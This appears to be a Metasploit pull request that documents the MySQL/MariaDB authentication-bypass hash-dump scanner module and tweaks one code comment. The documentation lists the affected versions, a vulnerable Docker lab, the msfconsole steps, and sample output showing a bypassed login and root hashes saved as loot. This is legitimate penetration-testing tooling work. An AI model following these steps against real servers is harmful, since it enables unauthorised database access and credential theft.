### PR TITLE
Fix broken mysql_authbypass_hashdump module

### DIFF
--- a/documentation/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.md
+++ b/documentation/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.md
@@ -1,0 +1,50 @@
+## Description
+
+This module exploits a password bypass vulnerability in MySQL in order
+to extract the usernames and encrypted password hashes from a MySQL server.
+These hashes are stored as loot for later cracking.
+
+Impacts MySQL versions:
+- 5.1.x before 5.1.63
+- 5.5.x before 5.5.24
+- 5.6.x before 5.6.6
+
+And MariaDB versions:
+- 5.1.x before 5.1.62
+- 5.2.x before 5.2.12
+- 5.3.x before 5.3.6
+- 5.5.x before 5.5.23
+
+## Environment Setup
+
+### Docker
+
+```
+docker run -it --rm -p 3306:3306 vulhub/mysql:5.5.23
+```
+
+## Verification Steps
+
+1. Do: `use scanner/mysql/mysql_authbypass_hashdump`
+2. Do: `set RHOSTS [IP]`
+3. Do: `run`
+
+## Scenarios
+
+```msf
+msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > rerun rhost=127.0.0.1
+[*] Reloading module...
+
+[+] 127.0.0.1:3306        - 127.0.0.1:3306 The server allows logins, proceeding with bypass test
+[*] 127.0.0.1:3306        - 127.0.0.1:3306 Authentication bypass is 10% complete
+[+] 127.0.0.1:3306        - 127.0.0.1:3306 Successfully bypassed authentication after 130 attempts. URI: mysql://root:Gmg@127.0.0.1:3306
+[+] 127.0.0.1:3306        - 127.0.0.1:3306 Successfully exploited the authentication bypass flaw, dumping hashes...
+[+] 127.0.0.1:3306        - 127.0.0.1:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
+[+] 127.0.0.1:3306        - 127.0.0.1:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
+[+] 127.0.0.1:3306        - 127.0.0.1:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
+[+] 127.0.0.1:3306        - 127.0.0.1:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
+[+] 127.0.0.1:3306        - 127.0.0.1:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
+[+] 127.0.0.1:3306        - 127.0.0.1:3306 Hash Table has been saved: /Users/adfoster/.msf4/loot/20230817230919_default_127.0.0.1_mysql.hashes_036424.txt
+[*] 127.0.0.1:3306        - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

--- a/lib/rbmysql.rb
+++ b/lib/rbmysql.rb
@@ -104,7 +104,7 @@ class RbMysql
   # @param [String / nil] passwd password to connect to mysqld
   # @param [String / nil] db initial database name
   # @param [Integer / nil] port port number (used if host is not 'localhost' or nil)
-  # @param [String / nil] socket socket file name (used if host is 'localhost' or nil)
+  # @param [String / Socket / nil] socket socket file name (used if host is 'localhost' or nil), or an existing ::Socket instance
   # @param [Integer / nil] flag connection flag. RbMysql::CLIENT_* ORed
   # @return self
   def connect(host=nil, user=nil, passwd=nil, db=nil, port=nil, socket=nil, flag=0)


### PR DESCRIPTION
Fixes the broken `scanner/mysql/mysql_authbypass_hashdump` module and adds documentation for the module.

This was spotted as broken by both @mubix and @rorymckinley 

## Verification

Follow the docker setup steps and ensure the module works as expected